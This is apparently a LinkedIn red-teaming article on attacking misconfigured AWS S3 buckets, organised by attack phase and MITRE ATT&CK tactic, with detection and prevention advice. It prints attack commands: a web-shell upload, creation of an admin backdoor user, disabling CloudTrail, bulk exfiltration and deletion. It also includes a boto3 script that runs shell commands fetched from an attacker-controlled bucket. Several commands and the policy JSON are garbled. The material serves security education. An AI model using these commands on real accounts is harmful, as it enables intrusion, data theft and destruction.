AWS S3 Buckets ~ RedTeaming wrt Misconfigurations Exploitations & MITRE Tactics
Sanjeev Singh
Global D&T Cybersecurity Architect???? Threat Hunter & Researcher????, Cybersecurity Mentor??, ??Red Teaming, Windows Breaker ?????, Gamer?????? Penetration Testing & Exploitation??
OffenseIsTheBestDefenseSeries: "RedTeaming on S3 Buckets"
Cloud infrastructure, particularly Amazon Web Services (AWS), is an integral part of modern enterprise environments. At the heart of this infrastructure lies the AWS Simple Storage Service (S3). While highly versatile and scalable, S3 also presents a significant attack surface when misconfigured. In this article, we will conduct a deep dive into red teaming techniques for attacking AWS S3 buckets, moving from understanding what S3 buckets are, to how attackers exploit their misconfigurations, and the various tools and tactics used to breach these assets. Each phase of an attack will be explored in detail, from Initial Access to Command and Control (C2), with scenarios, tools, commands, scripts, and detection challenges.
In this article, we will explore red teaming techniques related to AWS S3 bucket attacks, starting with understanding the S3 bucket’s role, common misconfigurations, and exploitation techniques. We'll cover various phases of attack including Initial Access, Execution, Persistence, Privilege Escalation & Lateral Movement, and Command and Control (C2). Along the way, we will demonstrate attack scenarios using tools, scripts, and commands, and then discuss detection and prevention strategies.
What is an AWS S3 Bucket?
An AWS S3 bucket is essentially a cloud-based storage resource designed to store and retrieve any amount of data at any time. It is used for storing data, application backups, static website content, logs, and much more. AWS S3 buckets can be accessed programmatically or through the AWS Management Console. AWS S3 provides multiple methods of access control, including bucket policies, IAM roles, Access Control Lists (ACLs), and Public/Private settings. Properly configured S3 buckets are secure and provide restricted access to data; however, misconfigurations can lead to severe security vulnerabilities.
Common Use Cases:
Consider this examples:
Misconfigurations Leading to Exploitation:
As the use of AWS S3 buckets grows, attackers have shifted their focus to exploiting the misconfigurations and vulnerabilities associated with them.
Misconfigured AWS S3 buckets are common and present significant risks. Publicly accessible buckets or insufficiently restricted permissions can allow attackers to perform unauthorized actions like downloading sensitive data or uploading malicious files.
Common Attack Scenarios:
{A} AWS S3 Attack Scenarios via Misconfigurations Exploitations
Misconfigured AWS S3 buckets are one of the most commonly exploited cloud vulnerabilities. Attackers exploit these buckets using various tools and methods to either read confidential data or upload malicious files. Let's walk through the phases of an attack on an AWS S3 bucket, covering each stage in depth.
1. Initial Access
Initial access is often gained through reconnaissance and enumeration. Attackers scan AWS environments for misconfigured buckets using a variety of tools to check for public read or write permissions. Once an exposed bucket is found, the attacker can begin interacting with the data stored inside it.
Scenario: Scanning for Open AWS S3 Buckets
In this example, let's assume an attacker wants to find open AWS S3 buckets that may have been misconfigured and are accessible to the public. The attacker uses various tools to scan for S3 buckets, check their permissions, and gain access.
Tools and Techniques for Initial Access:
Example Command: Using S3Scanner to Discover Buckets
# S3Scanner checks the status of the buckets and their permissions
python --input list_of_buckets.txt
In this initial step, the attacker uses S3Scanner to check the accessibility of AWS S3 buckets based on a list of bucket names. The tool tests for open access, listing which buckets allow public reads or writes.
Detection Challenge:
Detecting this reconnaissance phase can be difficult if proper logging isn't enabled. Attackers often blend in with legitimate traffic. CloudTrail logs should be monitored for unusual or unauthorized bucket access requests. However, the sheer volume of logs may make it hard to detect unless specific alerts are configured.
2. Execution
Once the attacker finds a bucket with public write permissions, they can upload malicious files or scripts for later execution. This could be as simple as uploading a malicious script for exploitation or as advanced as uploading payloads that help escalate privileges or exfiltrate data.
Scenario: Uploading a Malicious Web Shell to Gain Code Execution
Imagine an organization that uses an S3 bucket for serving static website files. Due to a misconfiguration, the bucket has public write permissions. The attacker uploads a malicious PHP shell to the bucket to gain command execution on the web server.
Tools and Techniques for Execution:
Example Command: Uploading a Web Shell
# Upload a malicious web shell to the vulnerable S3 bucket
aws s3 cp malicious_shell.php s3://vulnerable-bucket/ --acl public-read
The attacker uses the AWS CLI to upload a PHP web shell to the S3 bucket with public read permissions. Since the bucket serves files for a web application, accessing this file via a web browser could allow remote command execution on the server.
Execution & Impact:
Detection Challenge:
Detecting unauthorized file uploads to an S3 bucket is challenging, especially if the bucket is intended to be publicly writable. AWS CloudTrail logs must be enabled, and alerts should be set up for unusual PUT requests to buckets containing sensitive resources.
3. Persistence
After achieving execution, attackers often seek to establish persistence. This might involve creating new IAM users, modifying bucket policies, or setting up access keys to ensure future access even if the initial vulnerability is fixed.
Scenario: Creating a New IAM User for Persistent Access
Suppose the attacker has gained sufficient access to the AWS environment and wants to ensure long-term access. They create a new IAM user with administrative permissions to guarantee they can return later, even if their original access is detected and revoked.
Tools and Techniques for Persistence:
Example Command: Creating a New IAM User with Admin Privileges
# Create a new IAM user with admin privileges
aws iam create-user --user-name maliciousUser
aws iam attach-user-policy --user-name maliciousUser --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
The attacker uses the AWS CLI to create a new IAM user with administrative access. This new user ensures that the attacker retains access to the AWS account, even if their initial method of entry is closed off.
Persistence & Impact:
Detection Challenge:
Detecting the creation of new IAM users can be done by monitoring CloudTrail logs for IAM actions. Alerts should be configured to trigger on IAM role creation, policy attachment, or privilege changes. However, stealthy attackers may delay their malicious actions, making detection harder.
4. Privilege Escalation & Lateral Movement
With persistence established, attackers often escalate their privileges by exploiting misconfigured policies, roles, or permissions in AWS. From there, they can move laterally within the AWS environment to gain access to other services and resources.
Scenario: Exploiting Overly Permissive IAM Roles for Privilege Escalation
In this scenario, an attacker has access to an IAM role that, while not highly privileged, has permissions to pass roles or escalate privileges due to overly permissive configurations. They use this misconfiguration to escalate to full administrative rights.
Tools and Techniques for Privilege Escalation:
Example Command: Privilege Escalation Using Pacu
# Run Pacu's IAM privilege escalation module to detect and exploit misconfigurations pacu run iam__privesc_scan
Pacu scans for misconfigured IAM roles or policies that allow privilege escalation. This may involve finding roles that allow the "PassRole" action, enabling the attacker to escalate to an administrator.
Privilege Escalation & Impact:
Detection Challenge:
Detecting privilege escalation attempts requires monitoring IAM logs and looking for the creation of new roles, role assumption, or privilege changes. However, if attackers use legitimate roles to escalate, detection can be challenging without specific alerts set up for privilege changes.
5. Command and Control (C2)
Once an attacker has achieved persistence and escalated privileges, the next step is to establish a reliable and stealthy communication channel to exfiltrate data or maintain control over the compromised environment. In an AWS environment, attackers may abuse various AWS services like S3, EC2, Lambda, or even DNS-based channels to establish Command and Control (C2). They can use S3 buckets as a C2 channel by uploading and downloading files, or abusing services like Lambda to run arbitrary code remotely.
Scenario: Using S3 Buckets for C2 and Data Exfiltration
Let’s assume the attacker has compromised a system that uploads logs and reports to a vulnerable S3 bucket. The attacker uses this bucket to upload command files and receive responses. They also exfiltrate sensitive data through the bucket in small, inconspicuous increments to avoid detection.
Tools and Techniques for Command and Control:
Example Command: Using S3 for Exfiltration
# Upload stolen data to an S3 bucket controlled by the attacker
aws s3 cp /path/to/stolen_data.txt s3://attacker-controlled-bucket/
In this example, the attacker uses AWS CLI to upload exfiltrated data into an S3 bucket they control. This data may be sensitive files, logs, or even passwords and API keys.
Example Script: Python-based C2 Using Boto3
import boto3
s3 = boto3.client('s3')
# Download the C2 command from the attacker's bucket
response = s3.get_object(Bucket='attacker-controlled-bucket', Key='commands.txt')
commands = response['Body'].read().decode('utf-8')
# Execute the command (for demo, printing the command)
print(f"Received command: {commands}")
# Execute the command and upload results back to S3
output = subprocess.check_output(commands, shell=True)
s3.put_object(Bucket='attacker-controlled-bucket', Key='results.txt', Body=output)
In this scenario, the attacker sets up a C2 channel using an S3 bucket. The compromised system downloads a file (e.g., commands.txt) from the attacker's bucket, executes the command, and uploads the results back into the S3 bucket (e.g., results.txt). This method is particularly stealthy because it mimics regular cloud service interactions.
Detection Challenge:
Monitoring C2 through S3 requires careful inspection of CloudTrail logs. Unusual patterns of data uploads or downloads, especially between unexpected accounts, should be flagged for analysis. Set up anomaly detection in services like AWS GuardDuty to detect suspicious API calls.
{B} Red Teaming on AWS S3 Buckets Using the MITRE ATT&CK Framework
In this section, we’ll walk through how an attacker might exploit AWS S3 buckets based on the 14 tactics defined by the MITRE ATT&CK Framework. Each tactic represents a phase of an attack, from reconnaissance to impact. We’ll also discuss tools, techniques, commands, and detection challenges, providing a comprehensive view of how attackers target AWS S3 buckets.
1. Reconnaissance (TA0043)
Reconnaissance involves gathering information to plan future attacks. In the context of AWS, this might include scanning for publicly accessible S3 buckets, gathering information about IAM roles, or identifying public-facing resources.
An attacker scans for AWS S3 buckets with public read or write permissions to determine if they contain sensitive data or can be used for further attacks.
Tools and Techniques:
Example Command:
python --input list_of_buckets.txt
This command checks a list of potential bucket names to see if they are publicly accessible.
Detection Challenge:
Reconnaissance is difficult to detect because it often involves legitimate-looking requests. CloudTrail logs might show multiple failed GetObject requests or large numbers of API calls from unusual IPs.
2. Resource Development (TA0042)
Resource Development involves acquiring resources that can be used to support future operations, such as creating or compromising AWS accounts or building malicious payloads.
An attacker creates a new AWS account to stage malicious payloads and host them in an S3 bucket for use in a later phishing attack.
Tools and Techniques:
Example Command:
aws s3api create-bucket --bucket malicious-bucket --region us-east-1
The attacker creates a new bucket to host their malicious payloads.
Detection Challenge:
Resource development can be detected by monitoring the creation of new S3 buckets and IAM users. AWS CloudTrail and AWS Config should be configured to detect unusual resource creation.
3. Initial Access (TA0001)
Initial Access is when the adversary first gains entry into the target environment. This could be through misconfigured S3 buckets, phishing, or compromised credentials.
The attacker finds an S3 bucket with public write permissions and uploads a malicious script designed to be executed by a vulnerable web application.
Tools and Techniques:
Example Command:
aws s3 cp shell.php s3://vulnerable-bucket/ --acl public-read
The attacker uploads a PHP web shell into the bucket.
Detection Challenge:
Monitoring S3 bucket access logs is essential to detect unauthorized file uploads. AWS Config should be set to flag changes to bucket permissions.
4. Execution (TA0002)
Execution occurs when the attacker runs malicious code within the AWS environment. This could be triggered when a vulnerable application interacts with files stored in an S3 bucket.
An attacker uploads a malicious script to an S3 bucket hosting web content, and the script is executed when accessed by users.
Tools and Techniques:
Example Command:
aws s3 cp exploit.js s3://target-bucket/
The attacker uploads a JavaScript file that, when accessed by users, executes malicious code.
Detection Challenge:
Execution via S3 is challenging to detect unless access logging is enabled. Monitor for unusual access patterns, especially following uploads to buckets hosting executable files.
5. Persistence (TA0003)
Persistence refers to techniques that allow the attacker to maintain access to a compromised system. In AWS, this often involves modifying IAM policies or leaving backdoors in S3 buckets.
The attacker modifies the bucket policy of an S3 bucket to allow their IAM role persistent access, even after the initial misconfiguration is fixed.
Tools and Techniques:
Example Command:
aws s3api put-bucket-policy --bucket target-bucket --policy file://new_policy.json
The attacker modifies the bucket policy to allow future access.
Detection Challenge:
Unauthorized changes to bucket policies can be detected by monitoring CloudTrail logs and using AWS Config to track policy modifications.
6. Privilege Escalation (TA0004)
Privilege Escalation occurs when the attacker gains elevated permissions. In AWS, this often involves exploiting misconfigured IAM roles or policies.
The attacker discovers an IAM role with the ability to create new IAM users and assigns themselves administrative privileges.
Tools and Techniques:
Example Command:
pacu run iam__privesc_scan
This command identifies IAM roles with potential for privilege escalation.
Detection Challenge:
Detecting privilege escalation requires careful monitoring of IAM role creation and usage. CloudTrail should alert on abnormal IAM role activity.
7. Defense Evasion (TA0005)
Defense Evasion refers to techniques attackers use to avoid detection. This might involve disabling CloudTrail logging, tampering with logs, or using valid credentials to blend in with legitimate traffic.
The attacker disables CloudTrail logging for a specific bucket or region to avoid detection while making changes.
Tools and Techniques:
Example Command:
aws cloudtrail stop-logging --name myTrail
The attacker disables CloudTrail logging to hide their activities.
Detection Challenge:
Monitoring for changes in CloudTrail configurations is essential. AWS CloudWatch and Config can trigger alerts when CloudTrail logging is disabled.
8. Credential Access (TA0006)
Credential Access involves obtaining credentials such as AWS access keys or IAM passwords. These credentials may be found in exposed S3 buckets, compromised instances, or through phishing attacks.
An attacker locates AWS access keys in a misconfigured S3 bucket and uses them to access other AWS services.
Tools and Techniques:
Example Command:
trufflehog3 search --s3-bucket mybucket
The attacker uses TruffleHog to scan an S3 bucket for sensitive information such as access keys.
Detection Challenge:
AWS services like GuardDuty and Macie can help detect the storage of sensitive data in S3. Regular scanning and monitoring of bucket contents are essential.
9. Discovery (TA0007)
Discovery involves learning about the environment. Attackers may list S3 buckets, examine IAM roles, or probe other AWS resources to find weaknesses.
The attacker enumerates S3 buckets and checks their permissions to find accessible or vulnerable buckets.
Tools and Techniques:
Example Command:
aws s3 ls
This command lists the S3 buckets the attacker has access to, allowing them to explore further.
Detection Challenge:
Discovery activities often involve large numbers of API calls, especially ListBuckets and GetObject. Monitoring for abnormal API request patterns can help identify discovery attempts.
10. Lateral Movement (TA0008)
Lateral Movement refers to techniques that allow the attacker to move between systems within the AWS environment. In AWS, this can involve compromising multiple services, such as moving from an S3 bucket to EC2 instances or Lambda functions.
After compromising an S3 bucket, the attacker uses credentials found in the bucket to access EC2 instances within the same AWS account.
Tools and Techniques:
Example Command:
aws ec2 describe-instances --profile compromised_user
The attacker uses credentials to list available EC2 instances in the account.
Detection Challenge:
Monitor IAM role assumptions and cross-service API calls for unusual patterns. Tools like GuardDuty can flag lateral movement attempts between services.
11. Collection (TA0009)
Collection involves gathering data relevant to the attacker’s objectives. In the case of AWS, attackers may collect sensitive data from S3 buckets or other storage services.
An attacker accesses an S3 bucket containing sensitive customer data and downloads the files for exfiltration.
Tools and Techniques:
Example Command:
aws s3 sync s3://target-bucket/ ./local-folder
The attacker uses the sync command to download the entire contents of an S3 bucket to their local machine.
Detection Challenge:
Monitor for large data transfers from S3 buckets, especially if they occur outside of regular business hours or from unusual locations. AWS CloudWatch and GuardDuty can alert on such activity.
12. Exfiltration (TA0010)
Exfiltration refers to the attacker’s efforts to steal data from the AWS environment. In the case of S3, this often involves downloading or syncing sensitive data to an external location.
An attacker downloads sensitive data from an S3 bucket and uploads it to a remote server under their control.
Tools and Techniques:
Example Command:
aws s3 cp s3://target-bucket/data.csv
The attacker downloads a file from an S3 bucket and uploads it to their server.
Detection Challenge:
Monitor outbound network traffic for large data transfers or suspicious destinations. AWS Macie can help identify sensitive data stored in S3, making it easier to detect exfiltration attempts.
13. Command and Control (TA0011)
Command and Control involves the attacker establishing a means of communicating with compromised resources. This could be done via an S3 bucket, which the attacker uses to upload commands or receive data.
The attacker sets up an S3 bucket as a communication channel with a compromised Lambda function or EC2 instance, uploading commands or retrieving responses from the bucket.
Tools and Techniques:
Example Command:
aws s3 cp command.txt s3://control-channel/
The attacker uploads a file to the S3 bucket that contains instructions for the compromised service.
Detection Challenge:
Monitor for unusual bucket activity, especially if files are uploaded and downloaded frequently but without any regular business purpose. Tools like GuardDuty can detect abnormal S3 activity.
14. Impact (TA0040)
Impact involves the attacker attempting to manipulate, disrupt, or destroy data or systems. In AWS, this could involve deleting S3 buckets, encrypting data, or altering permissions to lock out legitimate users.
An attacker, having gained access to an S3 bucket, deletes or encrypts its contents, causing operational disruption for the target organization.
Tools and Techniques:
Example Command:
aws s3 rm s3://target-bucket/ --recursive
The attacker deletes all files in the target bucket, causing significant disruption to the business.
Detection Challenge:
Monitor for unexpected deletions or large-scale changes to bucket contents. AWS CloudTrail and AWS Config should be used to flag bucket modifications and deletions, and backups should be regularly maintained.
Detection and Prevention of AWS S3 Bucket Attacks
After walking through each phase of an attack, it’s crucial to understand how organizations can detect and prevent these types of threats. Detecting AWS S3 bucket attacks is challenging due to the flexibility of AWS services, but by leveraging AWS-native logging and monitoring tools, organizations can significantly improve their security posture.
Detection Methods
1. AWS CloudTrail Logs:
2. S3 Access Logs:
3. IAM Role Monitoring:
4. S3 Data Transfer Monitoring:
Prevention Methods
1. Strict Bucket Policies:
"Version": "2012-10-17",
"Statement": [
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::123456789012:role/YourIAMRole"
"Action": "s3:*",
"Resource": [
2. IAM Role Segmentation & Least Privilege:
3. Encryption:
4. Multi-Factor Authentication (MFA) for IAM:
5. Monitoring S3 Bucket Misconfigurations with AWS Config:
AWS S3 buckets are a powerful tool, but they also represent a significant attack surface if not properly secured. Attackers exploit misconfigurations to gain access, escalate privileges, exfiltrate data, and maintain control over cloud environments. By understanding how these attacks work, from the initial access phase to command and control, organizations can better secure their cloud assets.
Key takeaways include:
In a world where the cloud is an essential part of business operations, proactively securing your AWS environment is not just an option, but a necessity. Understanding how attackers exploit common vulnerabilities allows defenders to build stronger, more resilient systems.
This article was created in collaboration with Cyber4All . We extend our gratitude for their support and insights in bringing this important topic to light. Thank you!??